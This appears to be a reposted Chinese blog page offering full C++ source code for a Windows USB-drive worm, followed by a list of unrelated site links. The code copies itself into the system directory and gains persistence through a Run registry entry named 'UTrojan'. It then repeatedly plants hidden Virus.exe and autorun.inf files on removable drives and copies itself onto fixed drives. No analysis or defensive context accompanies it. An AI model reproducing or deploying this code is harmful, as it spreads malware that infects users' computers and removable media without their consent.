C++ U盘感染程序源码
来源:互联网 发布:淘宝怎样货到付款购物 编辑:程序博客网 时间:2024/05/18 04:51
C++ U盘感染程序源码
print?#include "stdafx.h"#include <stdio .h>#include <windows .h>HANDLE hMutex;//信号量句柄DWORD WINAPI infect(LPVOID lpParam);//感染void Install(void); //安装void InfectOtherDisk();//感染其它盘char ExeFile[MAX_PATH];//==========================================================================void Install(void){char FilePath[255]={0};char Explorer[12]="explorer ";HKEY AutoStart;STARTUPINFO si;PROCESS_INFORMATION pi;ZeroMemory( &si, sizeof(si) );si.cb = sizeof(si);ZeroMemory( &pi, sizeof(pi) );if(GetSystemDirectory(FilePath,254) == 0){return;}strcat(FilePath, "\\Virus.exe");CopyFile(ExeFile, FilePath, true);RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0, KEY_ALL_ACCESS, &AutoStart);RegSetValueEx(AutoStart, // subkey handle"UTrojan", // value name0, // must be zeroREG_SZ, // value type(LPBYTE) FilePath, // pointer to value datastrlen(FilePath) + 1); // length of value dataRegCloseKey(AutoStart);strcpy(FilePath,ExeFile); //now use FilePath[] as tempFilePath[3]='\0';strcat(Explorer,FilePath);CreateProcess( NULL, //open the directory of U-stick as usualExplorer,NULL,NULL,FALSE,0,NULL,NULL,&si,&pi );return;}//==========================================================================DWORD WINAPI infect(LPVOID lpParam){char Drives[255];int DriveType;char *pDrive=0;char FilePath[25];FILE *AutoRun;while(true){memset(Drives,0,255);memset(FilePath,0,25);pDrive=Drives;DriveType=0;AutoRun=NULL;GetLogicalDriveStrings(254,Drives);while(pDrive[0]!=NULL){DriveType=GetDriveType(pDrive);if(DriveType!=DRIVE_REMOVABLE){pDrive+=4;continue;}strcpy(FilePath,pDrive);strcat(FilePath,"Virus.exe");SetFileAttributes(FilePath,FILE_ATTRIBUTE_NORMAL);DeleteFile(FilePath);CopyFile(ExeFile, FilePath,false);SetFileAttributes(FilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);strcpy(FilePath,pDrive);strcat(FilePath,"autorun.inf");SetFileAttributes(FilePath,FILE_ATTRIBUTE_NORMAL);DeleteFile(FilePath);AutoRun=fopen(FilePath,"w+");if(AutoRun!=NULL){fputs("[AutoRun]\n",AutoRun);fputs("open=Virus.exe\n",AutoRun);fputs("shellexecute=Virus.exe\n",AutoRun);fputs("shell\\Auto\\command=Virus.exe",AutoRun);}fclose(AutoRun);SetFileAttributes(FilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);pDrive+=4;}Sleep(3000); //every 3sec to detect whether a U-stick exits}return 0;}//==========================================================================void InfectOtherDisk(void){char Drives[255];int DriveType;char *pDrive=0;char AppFilePath[25];char InfFilePath[25];memset(Drives,0,255);memset(AppFilePath,0,25);memset(InfFilePath,0,25);pDrive=Drives;DriveType=0;GetLogicalDriveStrings(254,Drives);while(pDrive[0]!=NULL){DriveType=GetDriveType(pDrive);if(DriveType==DRIVE_FIXED){strcpy(AppFilePath,pDrive);strcpy(InfFilePath,pDrive);strcat(AppFilePath,"Virus.exe");strcat(InfFilePath,"autorun.inf");CopyFile(ExeFile,AppFilePath, true);SetFileAttributes(AppFilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);CopyFile("autorun.inf",InfFilePath,true);SetFileAttributes(InfFilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);pDrive+=4;}else{break;}}}//==========================================================================int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow){// TOD Place code here.int DriveType;GetModuleFileName(NULL,ExeFile,MAX_PATH);//得到此程序的路径if((hMutex=CreateMutex(NULL,true,"UTrojan"))==NULL){return 0;}DriveType=GetDriveType(NULL);if(DriveType==DRIVE_REMOVABLE){Install();InfectOtherDisk();ReleaseMutex(hMutex);return 0;}else if (DriveType==DRIVE_FIXED){InfectOtherDisk();CreateThread(NULL,NULL,infect,NULL,NULL,NULL);return 0;}else{return 0;}}</windows></stdio>
- C++ U盘感染程序源码
- 感染U盘程序
- C# 实现u盘感染
- 感染PE文件源码
- u.vbe,已经被反U盘病毒的“病毒”感染.txt,所有盘打不开
- 后台拷贝U盘文件的程序源码。
- GPL源码感染的问题
- U盘感染下载者Xp.exe BoBoTurbo.exe logogogo.exe查杀综述
- 解决U盘感染病毒后所有文件及文件夹被隐藏的方法
- 感染linux脚本程序技术
- 感染EXE文件代码(C++)
- U盘安装程序
- delphi 简单PE文件感染源码!
- 感染导入表方法-附源码(转载)
- 一种U盘病毒源码
- 驱动感染技术扫盲(C描述)
- 驱动感染技术扫盲(C描述)
- 驱动感染技术扫盲(C描述)
- 试试vs2012
- Eclipse中修改tomcat内存大小
- 64位系统安装ODBC驱动的方法
- 9patch制作.9.png图并应用到android实例中
- 网络娱乐“被色情”,媒体误读的三种猜测
- C++ U盘感染程序源码
- 文本框输入限制大全
- 修改Oracle实例名
- Java实现链式栈
- Borland DataSnap(MIDAS)三层架构编程中,DataSetProvider的Option属性 .
- 打开资源视图时-提示在另一个编辑器中打开,但是已经关闭所有的打开文件还是这样
- 使整个网页变黑白色(灰色)的特效代码
- 导入导出
- SMS短信通API Java应用发送手机短信